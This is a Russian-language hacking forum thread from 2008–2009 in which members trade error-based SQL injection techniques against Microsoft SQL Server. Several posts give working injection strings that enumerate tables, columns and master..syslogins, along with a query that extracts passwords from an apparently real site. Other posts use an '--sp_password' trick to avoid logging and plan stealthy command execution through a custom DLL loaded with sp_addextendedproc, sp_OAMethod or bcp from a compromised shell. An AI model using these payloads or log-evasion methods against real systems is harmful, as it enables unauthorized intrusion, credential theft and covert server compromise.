Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.10.2008, 14:45
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234
Репутация:
56
|
|
Я с мелкософтовыми продуктами к сожалению не дружу, подскажите плиз, есть ли какая возможность все же выполнить "необходимые" запросы на сайте который выдает к примеру
на 1=(select db_name()) то что нужно.
на or 1=@@version - надо писать 1=(select @@version) тогда тоже выдает
---------------------
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
--------------
Но гад на select union или к примеру на такой
or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
выдает
Microsoft OLE DB Provider for SQL Server error '80040e21'
The requested properties cannot be supported.
-------
Читал вроде это из-за того что требует dbOwnerPrefix
хttp://www.aspplayground.net/forum/m375477.aspx
Но где его вставлять тогда?
И это имеется ввиду or 1=(select system_user) ?
Заранее огромное спасибо и конечно с меня +++ 
Решено. Был просто не внимателен. Сорри
Последний раз редактировалось tmp; 30.10.2008 в 17:56..
|
|
|
03.11.2008, 01:22
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234
Репутация:
56
|
|
Все же помогите понять один нюанс.
Запросом на подобии
or+1=(SELECT+TOP+1+TA BLE_NAME+FROM+INFORMATION_S CHEMA.TABLES
Выводятся имена таблиц. все отлично! Так же стандартными методами прочел имена БД. Но когда пришло время узнавать имена колонок.... вот тут получил задачку на которую сегодня весь вечер убил.
Сервер отвечал
---------------
error '80040e21'
The requested properties cannot be supported.
---------------
Как при не корректном запросе или если нет такой таблицы(БД и тд)
Решение нашел вот в таком запросе
or%201=(select%20top%201%201%20fro m%20information_s chema.tables+u nion+select+column_NAME+from+INFORMATION_S CHEMA.columns
По крайней мере за сегодняшний вечер я наконец увидел название колонки.
Если просто начинать инжектить с юнион-селект - то запрос выводит вышеприведенную ошибку 80040e21.
Завтра уже буду дабивать запрос до необходимого рабочего вида, но может кто то поможет понять почему так происходит?
Небольшое дополнение:
В общем - если у кого то случается такая бякак как у меня, нет вывода из системных таблиц и некоторых юзерских при or+1=(SELECT+TOP+1.....
то можно это сделать таким способом:
or 1=(select 1 from information_s chema.tables+union+select+name+from+m aster..syslogi ns)--sp_password
Был бы очень благодарен тому кто объяснит почему так происходит при первом примере запроса. А то что то в этих мелкософтовых продуктах как всегда все запутанно и все через ж0пу как я посмотрю)) трудно с нуля все разобрать. 
Последний раз редактировалось tmp; 03.11.2008 в 16:38..
|
|
|
|
14.04.2009, 21:39
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
SFX-SQLi (Select For Xml SQL Injection) - новый способ дампа таблиц за один запрос!
http://raz0r.name/obzory/select-for-xml-sql-injection/
|
|
|
|
26.04.2009, 13:32
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
Спокойно и непринужденно выводил нужные строки с MSSQL, как внезапно на все запросы начинает появляться ошибка:
ADODB.Recordset ошибка '800a0e79'
Операция не допускается, если объект открыт.
/_meta_title.asp, line 60
Потом через некоторое время она пропадает, но через n-ное кол-во запросов к базе опять появляется. Почему она возникает? |
|
|
|
02.05.2009, 15:48
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Есть вопрос по незаметному взлому MSSQL 2005.
Поскольку активация xp_cmdshell и прикосновения к Reconfigure после sp_configure оставляют в логах очень заметные следы, возникает вопрос, как это обойти и получить доступ к cmd.exe без них.
У меня идея такая:
можно посредством sp_addextendedproc сделать так:
exec sp_addextendedproc myProc, 'C:\myproc.dll'
где myproc - моя модная процедура, которая дает доступ к cmd.exe
Тут возникает проблема - нужно длл-ку на сервер закинуть, что невозможно физически.
Однако сдержимое dll мы можем в хекс перевести и закинуть в какую-нить таблицу, созданную для нее, а затем попытаться сделать как в mysql select our-super-string into OUTFILE 'c:\myproc.dll'
Однако в MSSQL нет into outfile, посему вопрос, что может помочь это сделать (не соря в логах)?
Есть sp_makewebtask, но он выводит не 1 в 1, а создает хтмл-страницу с названиями колонок - т.е. не катит.
Есть идеи? |
|
|
|
02.05.2009, 16:15
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Поскольку активация xp_cmdshell и прикосновения к Reconfigure после sp_configure оставляют в логах очень заметные следы, возникает вопрос, как это обойти и получить доступ к cmd.exe без них.
конструкция вида ;[inj];--sp_password позволяет избежать записи в лог.
Однако в MSSQL нет into outfile, посему вопрос, что может помочь это сделать (не соря в логах)?
Кроме sp_makewebtask есть sp_oamethod, с помощью которого можно произвести выгрузку содержимого в файл. Кроме того с помощью этой процедуры можно реализовать альтернативу xp_cmdshell без подгрузки внешних dll:
http://www.motobit.com/tips/detpg_cmdshell/
|
|
|
|
02.05.2009, 17:03
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от [Raz0r]
конструкция вида ;[inj];--sp_password позволяет избежать записи в лог.
Видел это, но на моей 2005 не работает оно, может это только для 2000?
пробовал и из management studio и из-под sqlcmd... Или может есть подтверждения, что на SQL2005 работает?
PS ну и в моем конкретном случае, в java шеллах точка с запятой оканчивает query, т.е. не поддерживаются двойные и т.д. query.
Сообщение от [Raz0r]
Кроме sp_makewebtask есть sp_oamethod, с помощью которого можно произвести выгрузку содержимого в файл. Кроме того с помощью этой процедуры можно реализовать альтернативу xp_cmdshell без подгрузки внешних dll:
http://www.motobit.com/tips/detpg_cmdshell/
Сенкс, этого не знал, но с ней тоже есть трабла:
SQL Server blocked access to procedure 'sys.sp_OAMethod' of component 'Ole Automation Procedures' because this component is turned off as part of the security configuration for this server.
И сразу в логах длиннющая запись...
added: и только сейчас дошло, что можно юзать bcp как раз для вывода в файл поэтому вопрос - где взять bcp для линукса? Заодно сейчас протестю сорит в логах он или нет при юзании bcp.
Последний раз редактировалось budden; 02.05.2009 в 17:11..
|
|
|
|
02.05.2009, 17:38
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Видел это, но на моей 2005 не работает оно, может это только для 2000?
да, проверил на локальном MSSQL 2005, действительно не работает
и только сейчас дошло, что можно юзать bcp как раз для вывода в файл
Каким образом ты собрался запускать bcp для вывода dll в файл? Полагаю, что только с помощью xp_cmdshell.
|
|
|
|
02.05.2009, 17:48
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от [Raz0r]
Каким образом ты собрался запускать bcp для вывода dll в файл? Полагаю, что только с помощью xp_cmdshell.
У меня не sql inj, а шелл на линуксовом серваке в локалке. С этого шелла я стучусь с логин/пассом до Win2003Server с SQL2005 - поэтому и стоит задача тихо получить возможность исполнять команды еще и на сервере2003.
Поэтому хочу пустить bcp с линуксового сервака. В логах SQL2005 будет сорить по поводу bcp только когда логин/пасс неправильные, когда все окей я проверил (на дефолтовых настройках) он об успешном коннекте bcp не сигнализирует в логах.
|
|
|
|
16.05.2009, 01:26
|
|
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429
Репутация:
66
|
|
У меня такой вопрос, если в названии таблицы есть пробелы то как вывести из неё двнные? ибо пишет ошибку синтаксиса. К примеру у меня название таблицы 'RGAuthor (child table)'. При запросе:
Код:
http://site.com/resguides/Resguide.asp?ID=1+or+1=(select+top+1+Password+from+RGAuthor (child table))
Выдаёт:
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'table'.
/resguides/Resguide.asp, line 13
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1224532){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1254668){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1254770){kind=avatar}
Похожие темы
Линейный вид
